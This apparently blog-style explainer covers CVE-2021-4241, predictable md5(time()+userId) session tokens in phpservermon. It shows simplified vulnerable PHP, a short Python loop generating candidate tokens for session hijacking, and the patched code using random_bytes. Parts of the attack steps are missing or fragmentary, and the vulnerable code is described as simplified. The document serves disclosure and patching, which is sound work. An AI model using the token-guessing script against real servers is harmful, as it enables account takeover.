In late 2021, a vulnerability identified as CVE-2021-4241 was discovered in the popular server monitoring tool, phpservermon. This issue, classified as "problematic," impacts the security of user sessions and could allow attackers to take over accounts by predicting session tokens. Let's take a deeper look at what happened, see how the exploit works, and learn how to fix it.
What is phpservermon?
phpservermon is an open-source PHP script that helps you monitor server uptime and performance. It's popular for small and medium-sized businesses because it's simple to use and manage.
About the Vulnerability
Where is the Problem?
The issue affects the setUserLoggedIn function found in the file:
src/psm/Service/User.php
What's the Cause?
This function uses a weak, predictable algorithm to generate the random token that identifies user sessions. If an attacker can guess or calculate future tokens, they can hijack sessions and potentially gain admin access on the system.
Vulnerability Detail:
*Use of predictable algorithm in random number generator.*
CVE: CVE-2021-4241
VDB: VDB-213744
Patch: bb10a5f3c68527c58073258cb12446782d223bc3
Here's a simplified (but representative) snippet of the problematic code (before the patch)
// File: src/psm/Service/User.php
// Unpatched version
public function setUserLoggedIn($userId) {
// Generates a "random" token for session
$token = md5(time() . $userId);
$_SESSION['logged_in'] = true;
$_SESSION['user_token'] = $token;
// ... other session stuff
}
The problem?
- The session token uses md5(time() . $userId), which is easy for attackers to guess, especially if they know the login time and userId.
How serious is this?
An attacker with basic info (e.g., user ID, approximate login time) could generate the same session token and hijack the user's session.
They also guess the user's ID (often a simple integer).
3. They generate possible session tokens by running md5 over combinations of $userId and a recent few timestamps.
Here’s how a simple attack could look in PHP or Python
import hashlib
import time
user_id = 1
login_time = int(time.time()) # Let's say you estimate the time
for delta in range(-5, 6): # Try a range of seconds
token_str = str(login_time + delta) + str(user_id)
session_token = hashlib.md5(token_str.encode()).hexdigest()
print("Try token:", session_token)
# Send this token with a session cookie to the app!
By repeating this process, the attacker can likely hijack the session if guessing is successful.
The Fix
To resolve the vulnerability, the use of a predictable value for tokens must be replaced with a cryptographically secure random value.
Patched code
// File: src/psm/Service/User.php
// After the patch (commit bb10a5f3c68527c58073258cb12446782d223bc3)
public function setUserLoggedIn($userId) {
// Use a cryptographically secure random generator
$token = bin2hex(random_bytes(32));
$_SESSION['logged_in'] = true;
$_SESSION['user_token'] = $token;
// ... other session stuff
}
Patch your installation!
Get the latest fixed version of phpservermon or manually apply the patch.
Monitor for similar issues:
Avoid using md5, sha1, or time/user-dependent values for session or security tokens.
References
- National Vulnerability Database (NVD) — CVE-2021-4241
- Vuldb Listing — VDB-213744
- phpservermon Patch Commit
- phpservermon GitHub
Conclusion
CVE-2021-4241 is a great example of why cryptographic randomness is critical for all authentication routines. If you’re running phpservermon, upgrade NOW, and double-check your other apps for similar vulnerabilities. Even small details, like how you generate a session token, can make a massive difference in keeping your software—and your data—safe.
Timeline
Published on: 11/15/2022 23:15:00 UTC
Last modified on: 07/18/2023 13:52:00 UTC